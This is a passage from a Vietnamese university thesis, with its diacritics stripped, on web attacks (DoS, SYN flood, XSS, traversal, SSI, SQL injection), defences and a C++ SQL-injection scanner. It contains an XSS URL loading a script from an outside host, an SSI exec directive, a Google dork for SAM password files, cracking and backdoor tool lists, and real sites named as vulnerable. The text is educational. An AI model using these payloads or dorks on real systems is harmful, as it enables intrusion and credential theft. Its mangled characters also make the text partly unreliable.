Tn cng kiu DoS l kiu tn cng lm cho cc dch v mng b t lit, khng cn kh nng p ng c yu cu na. Loi tn cng ny nh hng n nhiu h thng, rt d thc hin v li rt kh bo v h thng khi kiu tn cng DoS. Thng thng, kiu tn cng DoS da trn nhng giao thc (protocol). V d vi giao thc l ICMP, hacker c th s dng bomb e-mail gi hng ngn thng ip email vi mc ch tiu th bng thng lm hao ht ti nguyn h thng trn mail server. Hoc c th dng phn mm gi hng lot yu cu n my ch khin cho my ch khng th p ng nhng yu cu chnh ng khc.
-Trang 109-
Khoa CNTT
TN CNG VO RAM: Tn cng Dos chim 1 khong ln ca RAM cng c th gy ra cc vn ph hy h thng. Kiu tn cng BufferOverflow l mt v d cho cch ph hy ny (xem k hn trong ni dung chng..) TN CNG VO DISKS: Mt kiu tn cng c in l lm y a cng. a cng c th b trn v khng th c s dng na.
-Trang 110-
Khoa CNTT
Buc 1: My con gi gi tin SYN yu cu kt ni Bc 2: Nu my ch chp nhn kt ni, my ch s gi gi tin SYN/ACK Server bt buc phi gi thng bo li bi v TCP l chun tin cy nn nu my con khng nhn c thng bo th s ngh rng packet b lc v gi li mt packet mi . Bc 3: My con gi hi p bng gi tin ACK Bo cho my ch bit rng my con nhn c SYN/ACK packet v lc ny kt ni c thit lp.
-Trang 111-
Khoa CNTT
III.2. Li dng TCP thc hin phng php SYN flood truyn thng:
Nh cp v vn thit lp kt ni trong phn 1, bt c 1 gi tin SYN, my ch cng phi 1 phn ti nguyn ca h thng nh b nh m nhn v truyn d liu cho ng truyn . Tuy nhin, ti nguyn ca h thng l c hn v hacker s tm mi cch h thng trn qua gii hn . ( y cn c gi l half-open connection v my khch m kt ni gia chng) Theo hnh 9.III.2-1: Nu my ch sau khi gi tr mt gi tin SYN/ACK thng bo chp nhn kt ni cho my yu cu nhng nu a ch IP ca my yu cu ny l gi mo th gi tin khng th n c ch, nn my ch vn phi dnh ti nguyn cho yu cu . Sau mt thi gian khng nhn c phn hi t my khch, my ch li tip tc gi mt gi tin SYN/ACK xc nhn ln na v c nh vy, kt ni vn tip tc m. Nu nh hacker gi nhiu gi tin SYN n my ch n khi my ch khng th tip nhn thm 1 kt ni no na th lc ny h thng b ph v.
-Trang 112-
Khoa CNTT
Kt lun: Ch vi mt ng truyn bng thng nh, hacker c th ph v mt h thng. Thm vo , a ch IP ca hacker c th c sa i nn vic xc nh th phm l mt vn ht sc kh khn.
III.3.2.
Kiu tn cng th 2
Kiu tn cng ny c s dng khi ng truyn mng ca hacker l qu thp so vi ng truyn ca my ch. Khng ging nh kiu tn cng DoS truyn thng ( phn 2 ), kiu tn cng vo bng thng ln hn s li dng nhng gi tin t nhng h thng khc nhau cng mt lc tin n h thng ch khin cho ng truyn ca h thng ch khng cn kh nng p ng, my ch khng cn kh nng nhn mt gi tin no na.
-Trang 113-
Khoa CNTT
Theo hnh 9.III.3.2-1, tt c cc gi tin i vo 1 mng my tnh qua 1 "Big-Pipe" ( ng dn ln ), sau c router chia ra nhng "Small Pipe" ( ng dn nh ) cho nhiu my tnh con ty theo a ch IP ca gi tin. Nhng nu ton b "Big-Pipe" b lm ngp bng nhng gi tin ch hng n 1 my nht nh trong mng my tnh con ny, router nh phi chp nhn loi b phn ln cc packet ch cn li s lng va i qua "Small Pipe" ca my tnh . Kiu tn cng ny s loi my ch ra khi Internet. y l phng php tn cng kiu t chi dch v nhng khng l DoS m gi l DDoS ( kiu t chi dch v phn tn ), ngha l cng mt lc nhiu my s c pht ng gi gi tin n my ch ( mc d ng truyn ca mi my khng cao nhng nhiu ng truyn li hp thnh mt ng dn Big Pipe), lm cho my ch khng cn kh nng tip nhn gi tin v b loi khi mng Internet, nh s minh ha sau:c router chia ra nhng "Sm
-Trang 114-
Khoa CNTT
computer con ty
DRDoS (Distributed Reflection Denial of Service) - Th h tip theo ca DDoS: y cng chnh l nguyn nhn khin cho trang grc.com b ph v. Hnh sau s minh ha kiu tn cng DRDoS ny.
-Trang 115-
Khoa CNTT
Bng cch gi a ch IP ca my ch, hacker s cng lc gi nhiu gi tin n cc h thng my mnh trn mng, cc h thng ny khi nhn gi tin SYN gi ny, chp nhn kt ni v gi tr mt gi tin SYN/ACK thng bo. V a ch IP ca gi tin SYN b hacker sa i thnh a ch IP my ch nn nhng gi tin SYN/ACK s c gi v cho my ch. Cng mt lc nhn c nhiu gi tin, ng truyn ca my ch khng kh nng p ng, h thng my ch t chi nhn bt k gi tin no v lc ny h thng my ch b sp .
-Trang 116-
Khoa CNTT
-Trang 117-
Khoa CNTT
Tuy nhin cng c nhng phn mm c c kh nng trnh kiu tn cng ny. V d nh vi Linux kernels 2.0.30 v v sau ci t mt ty chn gi l SYN Cookie, kernel c nhim v truy tm v lu vt nhng kh nng c th xy ra k thut SYN. Sau , kernel s s dng mt giao thc m ho nh SYN cookie cho php ngi dng hp l ca h thng tip tc kt ni n h thng Vi WindowNT 4.0 tr v sau, s dng k thut backlog, mi khi hng i kt ni khng p ng, h thng t ng cung cp ti nguyn cho hng i, v th hng i s khng b ph v. ng dng ch cho php mi mt my con ch c thit lp s kt ni ti a theo qui nh trnh trng hp hacker gi cng lc nhiu yu cu gy tc nghn.
Nhn xt:
Kiu tn cng t chi dch v tuy ch khin cho h thng b ph v trong vi pht nhng hu qu th kh to ln (nh hng trn phm vi tin v uy tn). y l k thut thng c hacker s dng trong trng hp khng th chim quyn qun tr trn h thng hoc thng tin, hoc mun ph hy uy tn ca c quan .Thm vo vic gi mo a ch khin cho hacker cng d dng thc hin vic tn cng m khng s b pht hin. Thng thng k thut ny c thc hin km theo s h tr ca vi cng c nh ping of death, teardropNhng cng c ny c lit k thm trong chng 8 tip theo.
-Trang 118-
Khoa CNTT
Chng 10
-Trang 119-
Khoa CNTT
-Trang 120-
Khoa CNTT
V d 10.I.1-1:
http://www.myserver.c0m/script.php?mydata=%3cscript%20src=%22htt p%3a%2f%2fwww.yourserver.com%2fbadscript.js%22%3e%3c%2fscript%3e
-Trang 121-
Khoa CNTT
vt ng dn. Hacker c th yu cu trnh ch tr v kt qu l ni dung nhng tp tin vt l nh /etc/password Tm li: Kiu tn cng ny cng da vo s lng lo trong qu trnh kim tra d liu trn URL, cookie, HTTP Header yu cu. Li dng quyn truy xut mt tp tin ca ng dng, nh hacker c th xem c file lu tr trn h thng. V d 10.II.1-1:
http://maydich.com/show.asp?result= dangnhapthanhcong.asp
II.2.
Vic phng chng kiu tn cng vt ng dn l mt th thch ln cho nhng nh ng dng trong mt h thng phn tn. Tuy nhin, cch phng chng tt nht vn l ng dng cn kim tra vic truy xut file trc khi xut kt qu cho trnh duyt.
-Trang 122-
Khoa CNTT
-Trang 123-
Khoa CNTT
<!--#include file="test.asp"-->
Dng lnh trn nhng ni dung file test.asp vo trong trang Web. Tuy nhin, SSI khng phi c h tr trong hu ht cc trnh ch, Apache v IIS l 2 trnh ch h tr SSI. Trang Web c s dng SSI thng c lu di dng .shtml hoc .stm (l phn m rng ca .html hay .htm) bo hiu cho trnh ch bit trang ny c s dng SSI tit kim thi gian x l cho trnh ch (khng mt thi gian tm kim). Qu trnh thc hin x l mt trang Web yu cu: Nu khng c bt k ch th no khc, trnh ch ch gi ni dung trang Web cho trnh duyt nhng vi mt SSI, th cng vic tun t theo nhng bc nh sau: Trnh ch nhn d liu v phn tch d liu (tm kim v phn loi nhng cu lnh c bit) ch th thc hin Da trn nhng cu lnh m trnh ch tm thy, trnh ch thc thi nhng cu lnh tr kt qu cho trnh duyt. Tr kt qu v cho trnh duyt C 3 kh nng thc hin: Nhn thng tin t mt file v chn vo trong trang Gn gi tr cho mt s bin Gi chng trnh CGI Ni dung cu lnh SSI xem trong phn ph lc.
-Trang 124-
Khoa CNTT
-Trang 125-
Khoa CNTT
Chng 11
-Trang 126-
Khoa CNTT
Theo ti liu Hacking Exposed ca Stuart McClure, Joel Scambray, George Kurtz th cc k tn cng thng thc hin cc giai on sau khi tn cng
-Trang 127-
Khoa CNTT
Bc th ba l tm kim nhng ti nguyn c bo v km, hoch ti khon ngi dng m c th s dng xm nhp, bao gm cc mt khu mc nh, cc script v dch v mc nh. Rt nhiu ngi qun tr mng khng bit n hoc khng sa i li cc gi tr ny. Cc cng c ph tr: null sessions, DumpACL, sid2user, OnSite Admin showmount, NAT Legion banner grabbing vi telnet, netcat, rpcinfo. Bc 4: Gaining access (Tm cch xm nhp): By gi hacker s tm cch truy cp vo mng bng nhng thng tin c c ba bc trn. Phng php c s dng y c th l tn cng vo li trn b m, ly v gii m file password, hay brute force (kim tra tt c cc trng hp) password. Cc cng c: tcpdump, L0phtcrack readsmb, NAT, legion, tftp, pwdump2 (NT) ttdb, bind, IIS, HTR/ISM.DLL. Bc 5: Escalating privilege (Leo thang c quyn): Trong trng hp hacker xm nhp c vo mng vi mt ti khon no , th h s tm cch kim sot ton b h thng. Hacker s tm cch crack password ca admin, hoc s dng l hng leo thang c quyn. John v Riper l hai chng trnh crack password rt hay c s dng. Cng c: L0phtcrack, Ic_messages, getadmin, sechole. Bc 6: Pilfering (Dng khi cc file cha pass b s h):
-Trang 128-
Khoa CNTT
Thm mt ln na cc my tm kim li c s dng tm cc phng php truy cp vo mng. Nhng file text cha password hay cc c ch khng an ton khc c th l ch cho hacker. Thng tin ly t bc trn ta nh v server v iu khin server. Nu bc ny khng thnh cng, n bc <9>. Cng c h tr: rhost, LSA Secrets user data, configuration files, Registry. Bc 7: Covering Tracks (Xo du vt) : Sau khi c nhng thng tin cn thit, hacker tm cch xo du vt, xo cc file log ca h iu hnh lm cho ngi qun l khng nhn ra h thng b xm nhp hoc c bit cng khng tm ra k xm nhp l ai. Xa log. Cng c: Zap, Event log GUI, rootkits, file streaming. Bc 8: Creating Backdoors (To ca sau chun b cho ln xm nhp tip theo c d dng hn): Hacker li "Back Doors", tc l mt c ch cho php hacker truy nhp tr li bng con ng b mt khng phi tn nhiu cng sc, bng vic ci t Trojan hay to user mi (i vi t chc c nhiu user). Cng c y l cc loi Trojan, keylog, creat rogue user accounts, schedule batch jobs, infect startup files, plant remote control services, install monitoring mechanisms, replace apps with Trojan.
-Trang 129-
Khoa CNTT
Cng c: members of wheel, administrators cron, At rc, Startup folder, registry keys, netcat, remote.exe, VNC, BO2K, keystroke loggers, add acct to secadmin mail aliases login, fpnwclnt.dll
-Trang 130-
Khoa CNTT
+ Tm file SAM (y l file cha Password ca Windows NT, dng L0phtCrack Crack) th vo http://www.google.com v nh type file:SAM Tn cng vt qua cc c ch kim sot (authentication, authorization) Bao gm cc phng php nh on mt khu, thay i thng tin cookies, cc k thut directory traversal, leo thang c quyn, cc phng php tn cng da vo SQL, SQL injection... Tm hiu su v cc chc nng ca ng dng web Tm hiu cch thc hin ca cc phn trong ng dng, c bit nh cc order input, confirmation, order tracking. y ta c th p dng cc phng php nh SQL Injection, input validation... Tm hiu lung di chuyn ca thng tin Cc thng tin tng tc gia client v server, cc thng tin tng tc vi database. Hin nay vic vit m thc hin vic giao tip thng tin thng phi m bo c tnh hiu qu (nhanh), v bo mt (c th s chm hn). Thng th tnh hiu qu c u tin hn do c th s pht sinh li trong qu trnh v gip hacker c th li dng cc li nh SQL input... ot quyn iu khin h thng.
III. TN CNG
Sau khi thu thp v kho st k cng i tng, hacker bt u thc hin tn cng nhm xm nhp vo h thng ly thng tin, a thng tin xu vo, dnh quyn kim sot, Cn nu khng thnh cng trong vic xm nhp, th Dos l cch thc cui cng m hacker thng la chn lm cho h thng khng th hot ng c.
-Trang 131-
Khoa CNTT
Nhn xt:
Vic thu thp thng tin l v cng quan trng cho vic tn cng vo mt h thng my ch. Cho d hacker tn cng theo phng din phn cng hay qua ng dng th vic thu thp vn l cn thit. Vn l vic thc hin s theo tng bc nh th no. C th trong nhng bc nu hacker khng cn phi i qua theo th t hay qua ht, nhng vic nm r thng tin ca my ch lun l iu kin tin quyt dn n thnh cng trong vic tn cng. Ty vo ni dung thng tin m hacker thu thp c m hacker s quyt nh tn cng theo k thut no. Do , vic bo mt cho mt h thng cn i hi s kt hp khng ch ca ring nh qun tr h thng m cn ca nh thit k ng dng v s hp tc ca c nhng khch hng s dng ng dng. Nhim v ny s c cp r hn trong chng 12.
-Trang 132-
Khoa CNTT
Chng 12
-Trang 133-
Khoa CNTT
Phng chng hacker khng phi l nhim v ca ring nhng ngi lp trnh Web m cn c s kt hp, h tr ca ngi qun tr v chnh bn thn ngi dng. Thiu st mt trong nhng yu t ny u c th dn n thng tin b nh cp v thm ch hacker c th iu khin c c h thng mng. V th, bo v mt h thng khi s tn cng ca hacker, lun vn s trnh by theo 3 vai tr: vai tr ngi qun tr mng, vai tr ngi lp trnh ng dng v vai tr ca ngi dng.
-Trang 134-
Khoa CNTT
Xc nh nguy c i vi h thng chnh l xc nh cc l hng bo mt ca cc dch v, ng dng trn h thng . Vic xc nh ng n cc nguy c ny gip ngi qun tr c th trnh c nhng cuc tn cng mng, hoc c bin php bo v ng n bng cch thng xuyn cp nht tin tc trn cc nhm tin v bo mt v t nh cung cp phn mm pht hin nhng li ca phn mm s dng. Khi pht hin li cn cp nhp nhng phn mm mi nht trnh trng hp hacker li dng nhng l hng c trong nhng ng dng cha c sa cha trong phin bn c. Nm c hot ng ca cc phn mm s dng, ngha ca cc file cu hnh quan trng (nh etc/password), p dng cc bin php bo v cu hnh nh s dng phng thc m ha hashing code (MD5). S dng mt vi cng c c th pht hin ra cc hot ng truy nhp khng hp l vo mt h thng nh logfile. Kim sot cht ch cc quyn ca cc ti khon trn h thng; khng s dng quyn root trong cc trng hp khng cn thit. i vi cc ti khon khng s dng trn h thng cn i mt khu hoc hy b. Qun l mt khu mt cch cht ch o Buc ngi s dng thay i mt khu trong mt thi gian nht nh. Hu ht cc h thng hin nay u h tr c ch ny; nu khng thay i mt khu, ti khon khng cn gi tr trn h thng. o Trong trng hp ngi s dng b mt mt khu, cp li mt khu mi cn c cc th tc khc xc thc ngi s dng ...
-Trang 135-
Khoa CNTT
-Trang 136-
Khoa CNTT
Nhiu ng dng hin nay qun l mt phin lm vic ca ngi dng bng sessionID nhng s yu km trong cch qun l mt phin lm vic khin cho hacker c th d dng kim sot c mt phin lm vic ca ngi dng nh trong k thut qun l phin lm vic. V th, i vi mt phin lm vic, ng dng cn hy ngay sau khi trnh duyt ng kt ni. M ha d liu quan trng: Nhng thng tin quan trong nh tn/mt khu, credit card, cn c m ha trnh hacker c th ly c ni dung v s dng chng nh trong k thut XSS, SQL Injection...Ngoi ra, trong qu trnh truyn, kt hp phng php SSL trnh trng hp mt mt thng tin trn ng truyn. Hin nay trong lnh vc m ha d liu, c rt nhiu phng php m ha nh m ha kha b mt, m ha kha cng khai,nn ty vo mc s dng cng nh tm quan trng m ng dng c th chn mt trong nhng phng php m ha m bo d liu c bo mt. Tuy nhin, hin nay nhiu nh ng dng li m ha d liu kt hp vi vi thng tin nh ngy gi, a ch IPkhin cho hacker c th d dng d on, hoc ni dung d liu m ha qu ngn khin cho hacker c th s dng nhng cng c sn c vt cn nhng kh nng c th xy ra nh trong k thut tn cng sessionID. Hoc phng php m ha qu c khin cho hacker c th d dng dng nhng cng c gii m nh John and Ripper. Do , cn chn thut ton m ha cng vi kha m ha sao cho d liu khng d d on v b vt cn.
-Trang 137-
Khoa CNTT
Ngoi ra, vic dng SSL l cn thit trnh trng hp d liu b nh cp trn ng truyn. Dng phn mm c sn: Hin nay trn th trng xut hin nhng phn mm nh Appshield hot ng nh mt proxy, ngha l trung gian gia my khch v my ch, mi yu cu t my khch u i qua phn mm ny, nu pht hin trong yu cu c n cha kh nng tn cng ln h thng, n s t chi yu cu, khng gi ln my ch na m s t ng hy yu cu. Thit lp quyn: Vi nhng ng dng, h thng ch nn cung cp nhng quyn hn nht nh sao cho ng dng thc hin cc chc nng ca mnh. Khng nn a quyn cao nht, nh root v hacker c th li dng quyn root ny c th thc thi nhng cu lnh ca h thng, nh trong k thut tn cng SQL Injection, Buffer Overflow
-Trang 138-
Khoa CNTT
b, trnh kh nng hacker vn tip tc dng session ID tn ti ng nhp vo h thng hp l. Qun l ti khon: Ngi s dng cn nhn thc c vai tr quan trng trong vic bo v ti khon ca mnh. Cc hot ng qun l ti khon bao gm vic bo v mt khu, thay i mt khu nh k, ng k thi im, ... S dng cc phn mm bo v my trm ca ngi s dng, log out khi h thng sau mt thi gian time-out ... o Pht hin ti khon s dng tri php: Ngi dng cn c hun luyn v cc cch pht hin ti khon ca mnh s dng tri php nh th no. Ngi s dng cn thng xuyn kim tra cc hot ng ca mnh m bo khng c ngi khc li dng ti khon thc hin nhng hnh ng khc.
Nhn xt:
Mc d vic bo mt l kh khn v h thng khng bao gi c xem l t 100% v an ton nhng nu c s kt hp y gia ba nhn t trn th s gim thiu ti a nhng ri ro c th xy ra. Thiu mt trong ba nhn t th h thng lun nm trong trng thi bo ng v an ton.
-Trang 139-
Khoa CNTT
PHN TH BA
-Trang 140-
Khoa CNTT
Chng 13
-Trang 141-
Khoa CNTT
I.2. Yu cu
T nhng tng trn, ng dng c nhng yu cu nh sau:
-Trang 142-
Khoa CNTT
-Trang 143-
Khoa CNTT
-Trang 144-
Khoa CNTT
III. CI T
III.1. Ngn ng ci t
Web Checker l ng dng c s dng giao thc HTTP trao i thng tin trn mng. Do cng vic lp trnh c n gin, ng dng phi tn dng cc th vin lp trnh mng v ActiveX Control c sn trong cc mi trng lp trnh. Mt phn cng quan trng khng km l ngn ng c chn l mi trng ci t phi quen thuc, c th d dng nhanh chng vn dng xy dng ng dng. Vi cc l do trn, lun vn chn MS Visual C++ lm mi trng pht trin cho ng dng. Yu cu h thng: o H iu hnh:WinXp, WinNT, Win 2000, Win 9x vi giao thc TCP/IP o Mng: Kt ni Internet hoc trnh ch Web ti my cc b. o Phn cng: cng cn trng 10 MB.
III.2. Phng php ci t III.2.1. S dng m hnh giao din dng Dialog
Do ng dng c xy dng vi tnh n gin d s dng ch gm mt mn hnh. Nn m hnh giao din c chn l Dialog.
-Trang 145-
Khoa CNTT
CArray < Result *, Result *> m_result; CArray < Test *, Test *> m_Test; bool m_IsPost; CString m_sData; CString m_HTTPbody; CString m_HTTPreceive; CString m_HTTPsend; ... protected:
// Loi yu cu POST/GET //D liu trong Header yu cu //Phn thn ca HTTP tr li //Header tr li //Header yu cu
afx_msg void OnBeforeNavigate2Explorer(LPDISPATCH, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, VARIANT FAR*, BOOL FAR*); private: //Hm bt s kin trn trnh duyt Web
-Trang 146-
Khoa CNTT
K tha t lp CDialog, ngoi nhim v qun l dialog, lp cn c chc nng sau: Thc hin cc yu cu duyt Web ca ngi dng thng qua phng thc Browse(). Hin th d liu ca bin m_HTTPbody thnh trang Web thng qua phng thc InsertHTML(). Phng thc getTextFile() c d liu mu kim t tp tin ngay khi chy chng trnh v lu tr trong mng m_Test. Phng thc scanWeb() l phng thc chnh c gi khi ngi s dng chn nt kim tra. Phng thc c chc gi cc hm x l khc kim tra trang Web, phn tch v a ra kt qu. Lp Checker
class Checker { public: void inject(CString &, int, CString ); //Chn d liu mu kim vo CString getForumValue(int ,CString ,CString &,CString &, CString &); //Ly d liu trong form //Ly d liu trong lin kt Checker(); virtual ~Checker(); ... Cstring getLinkValue(int ,CString, CString &,CString &)
-Trang 147-
Khoa CNTT
};
nh ngha cc phng thc: Ly d liu thc ca cc i tng cn kim nh form/ lin kt trong trang sau s c chng trnh ln lt chn cc mu kim thng qua phng thc inject() ri gi ln trnh ch. Chn gi tr mu kim vo d liu ca form/ lin kt.
Lp Request
class Request { public: Request(); virtual ~Request(); private: void ParseURL(LPCSTR url,LPSTR protocol,int lprotocol, LPSTR host,int lhost,LPSTR request,int lrequest,int *port); //Phn r chui URL int SendHTTP(LPCSTR url,LPCSTR headers,BYTE *post, DWORD
postLength,HTTPRequest *req); //M kt ni, gi HTTP yu cu v nhn HTTP tr li public: void SendRequest(bool IsPost, LPCSTR url, CString &psHeaderSend, CString &psHeaderReceive, CString &psMessage); //Nu yu cu l GET th dng cung cp ca ActiveX cn POST th gi hmSend HTTP ... };
nh ngha cc phng thc mc thp l giao tip trc tip vi trnh ch:
-Trang 148-
Khoa CNTT
Phng thc SendHTTP c gi thng qua cc phng thc SendRequest() v Browse(). Phng thc ny c nhim v to kt ni n trnh ch, gi yu cu v nhn thng ip tr li t trnh ch . Cc thng dip nhn v s c cp nht vo bin ton cc chnh l m_HTTPsend,m_HTTPreceive, m_HTTPbody.
Lp Test
class Test { public: Test(); virtual ~Test(); CString m_errType; CString m_errName; CString m_strInject; CArray <CString,CString> m_strRslt; }; //Loi l hng //Tn l hng //Chui k t chn //Cc chui kt qu
nh ngha kiu d liu mu kim. D liu s c c t tp tin test.txt. nh dng ca tp tin test.txt: Chui k t s chn vo
%27\1 ... incorrect syntax\1unclosed quotation mark\1 ... ... 1\2
Cc mu kt qu pht hin li
S th t li
Tn li
SQL Injection ...
Lp Result
-Trang 149-
Khoa CNTT
class Result { public: Result(); virtual ~Result(); CString m_object; int m_ind; CString m_properties; }; //i tng kim tra //v tr trong trang Web //thuc tnh ca i tng
nh ngha kiu d liu kt qu, c nhim v lu tr kt qu kim tra ca trang Web v c kt xut ra mn hnh chng trnh khi kim tra xong trang Web thng qua phng thc ShowResult().
-Trang 150-
Khoa CNTT
Mn hnh ng dng gm c ba phn chnh: ng dng web: nh mt trnh dng m trang web cn kim tra v hin th kt qu nh du trc tip vo v tr kim tra trong trang web c an ton hay khng an ton.
-Trang 151-
Khoa CNTT
Kt qu: Lit k kt qu sau kim tra gm cc v tr kim tra an ton hay khng an ton v nhng l hng m v tr mc phi. Li khuyn: Nu pht hin ra li th s hin th cch phng chng li khi chn tn li bn phn kt qu.
-Trang 152-
Khoa CNTT
Chng trnh s nh du trc tip vo trang Web v tr c kim tra (mu xanh l an ton, mu l khng an ton).
IV.1. Nhng vn t c
Thng pht hin mt s li bo mt nh SQL Injection, Form Field Manipulation, URL Manipulation ca mt ng dng Web trn Interbet minh ha cho phn l thuyt ca cc k thut . Th hin r rng, trc quan kt qu cc v tr kim tra. a ra cc gi v bin php phng chng i vi li bo mt pht hin c. V d 13.IV.1-1: Chng trnh pht hin c li bo mt v SQL Injection ca ng dng Web (www.progenic.com). C th l cc lin kt n ni dung tin tc khng c kim tra d liu nhp.
http://www.progenic.com/out/?id=5 ...
IV.2. Nhng vn hn ch
Do s dng c ch kh n gin l kim th v nh gi kt qu nhn c, nn chng trnh khng th pht hin cc li bo mt phc tp. Hiu qu t c thp i vi cc ng dng c cch thit k l.
-Trang 153-
Khoa CNTT
V d 13.IV.2-1: Chng trnh khng pht hin ra li vi ng dng Web (www.thanglongmetalwares.com/sanpham.asp) mc d ng dng c li bo mt SQL Injection. Nguyn nhn tht bi l do ng dng lu tr cu truy vn trong cc i tng ca form nn khi chng trnh kim tra form s lm thay i cu truy vn nn lm thay i hot ng ca ng dng Web.
<form method="post" action="Sanpham.asp" name="Sanpham"> <input type="hidden" name="strSQL" value="SELECT * FROM Products Where Language = 1 ORDER BY Date DESC"> <input type="hidden" name="Page" value="1"> ...
-Trang 154-
Khoa CNTT
Kt lun
KT LUN
Ni dung: I. II. Nhng vn t c Hng pht trin
-Trang 155-
Khoa CNTT
Kt lun
KT LUN
I. NHNG VN T C
Theo yu cu t ra ban u l Nghin cu cc k thut tn cng v bo mt ng dng Web, cho n thi im hin ti, lun vn t c cc ni dung sau: Tm hiu cc k thut tn cng ng dng Web bao gm cc k thut o Thao tc trn tham s truyn nh URL, bin n form, cookie, HTTP header. o Chn m lnh thc thi trn trnh khch Cross-site Scripting. o Chn cu truy vn SQL o nh chim phin lm vic ca ngi dng o Trn b m o T chi dch v o Cc k thut khc nh: M ha URL, vt ng dn, k t rng, ngn ng pha trnh ch, Cc bin php bo mt t s kt hp gia nh qun tr mng, nh thit k ng dng Web v ngi dng V chng trnh Web Checker t mt s ni dung c bn sau: o Kim tra mt trang Web c kh nng b tn cng bng nhng k thut chn cu lnh SQL, thay i tham s hay khng. o Chng trnh cho php ngi dng thc hin giao tip vi trnh ch ging nh mt trnh duyt thng thng.
-Trang 156-
Khoa CNTT
Kt lun
-Trang 157-
Khoa CNTT
Ph lc
Ph lc
Ni dung: A. B. C. HTTP header URL Encoding Server Side Include
-Trang 158-
Khoa CNTT
Ph lc
Ph lc A: HTTP HEADER
Cc tham s thng thng l tham s c th dng trong c HTTP request v HTTP response Tn
Cache-Control Connection Date Pragma Trailer Transfer-Encoding Upgrade Via Warning max-age=10 Close Tue, 11 Jul 2000 18:23:51 GMT no-cache Date Chunked SHTTP/1.3 HTTP/1.1 Proxy1, HTTP/1.1 Proxy2 112 Disconnected Operation
Gi tr v d
Gi tr v d
text/html, image/*
-Trang 159-
Khoa CNTT
Ph lc
Host If-Match If-Modified-Since If-None-Match If-Range If-Unmodified-Since Max-Forwards Proxy-Authorization Range Referer TE User-Agent
www.microsoft.com entity_tag001 Tue, 11 Jul 2000 18:23:51 GMT entity_tag001 entity_tag001 hay Tue, 11 Jul 2000 18:23:51 GMT Tue, 11 Jul 2000 18:23:51 GMT 3 [credentials] Bytes=100-599 http://www.microsoft.com/resources.asp trailers Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)
Gi tr v d
-Trang 160-
Khoa CNTT
Ph lc
Cc tham s thc th c th dng trong HTTP request v HTTP response. Cc tham s ny cho bit thng tin v phn thn, v d nh l chun m ho c s dng. Tn
Allow Content-Encoding Content-Language Content-Length Content-Location Content-MD5 Content-Range Content-Type Expires Last-Modified GET, HEAD Gzip En 8445 http://localhost/page.asp [md5-digest] Bytes 2543-4532/7898 text/html Tue, 11 Jul 2000 18:23:51 GMT Tue, 11 Jul 2000 18:23:51 GMT
Gi tr v d
-Trang 161-
Khoa CNTT
Ph lc
Ph lc B: URL ENCODING
K t M Hexa
%00 %01 %02 %03 %04 %05 %06 %07 backspace %08 tab %09 %0b %0c c return %0d %0e %0f %10 %11 %12 %13 %14 %15 %16 %17 %18 %19 %1a %1b linefeed %0a 0 1 2 3 4 5 6 7 8 9 : ; < = > ? @ A B C D E F G H I J K %30 %31 %32 %33 %34 %35 %36 %37 %38 %39 %3a %3b %3c %3d %3e %3f %40 %41 %42 %43 %44 %45 %46 %47 %48 %49 %4a %4b ` a b c d e f g h i j k l m n o p q r s t u v w x y z { %60 %61 %62 %63 %64 %65 %66 %67 %68 %69 %6a %6b %6c %6d %6e %6f %70 %71 %72 %73 %74 %75 %76 %77 %78 %79 %7a %7b | %90 %91 %92 %93 %94 %95 %96 %97 %98 %99 %9a %9b %9c %9d %9e %9f %a0 %a1 %a2 %a3 %a4 %a5 %a6 %a7 %a8 %a9 %aa %ab %c0 %c1 %c2 %c3 %c4 %c5 %c6 %c7 %c8 %c9 %ca %cb %cc %cd %ce %cf %d0 %d1 %d2 %d3 %d4 %d5 %d6 %d7 %d8 %d9 %da %db %f0 %f1 %f2 %f3 %f4 %f5 %f6 %f7 %f8 %f9 %fa %fb %fc %fd %fe %ff
-Trang 162-
Khoa CNTT
Ph lc
%1c %1d %1e %1f space ! " # $ % & ' ( ) * + , . / %20 %21 %22 %23 %24 %25 %26 %27 %28 %29 %2a %2b %2c %2d %2e %2f
L M N O P Q R S T U V W X Y Z [ \ ] ^ _
%4c %4d %4e %4f %50 %51 %52 %53 %54 %55 %56 %57 %58 %59 %5a %5b %5c %5d %5e %5f
| } ~
%7c %7d %7e %7f %80 %81 %82 %83 %84 %85 %86 %87 %88 %89 %8a %8b %8c %8d %8e %8f
%ac %ad %ae %af %b0 %b1 %b2 %b3 %b4 %b5 %b6 %b7 %b8 %b9 %ba %bb %bc %bd %be %bf
%dc %dd %de %df %e0 %e1 %e2 %e3 %e4 %e5 %e6 %e7 %e8 %e9 %ea %eb %ec %ed %ee %ef
-Trang 163-
Khoa CNTT
Ph lc
V d
<!--#config sizefmt="bytes" -->
Gii thch iu khin kch thc file v ngy ly cookie trn trnh ch tng s kt ni
<!--#cookie if="C1" then="hello" alt="bye"-->, <!--#hitcount --> <!--#echo reqheader="referer" --> <!--#exec cmd="ls -lsa" -->
FLASHMOD <!--#flastmod-->
<!--#fsize --> <!--#include file="included.html" --> <!--#jdbc select="SELECT * FROM User"
File, virtual, ifheader, else Select, url, name, column, next, driver, password, user
SERVLET
Cu lnh iu khin
-Trang 164-
Khoa CNTT
Ph lc
Name Name Name, command, var, equals Name, command, var, equals Name
<!--#endloop name="loop2" --> Name <!--#exitloop name="loop2" command="cpt" var="cpt1" equals="4" -->
IF
LOOP
-Trang 165-
Khoa CNTT
Hacking Exposed, Stuart McClure, Joel Scambray, George Kurtz RFC2617, J.Franks, P. Hallam-Baker, J.Hostetler, S. Lawrence, P. Leach, A. Luotonen, L. Stewart 06/1999 http://www.sqlsecurity.com/ http://www.nextgenss.com/papers/ http://www.owasp.org/ http://www.4guysfromrolla.com/webtech/ http://www.guardent.com/ http://www.idefense.com/ http://www.jmu.edu/computing/info-security/engineering/issues/ http://www.microsoft.com/technet/support/ http://www.microsoft.com/technet/security/ http://community.whitehatsec.com/ http://www.codeproject.com/
-Trang 166-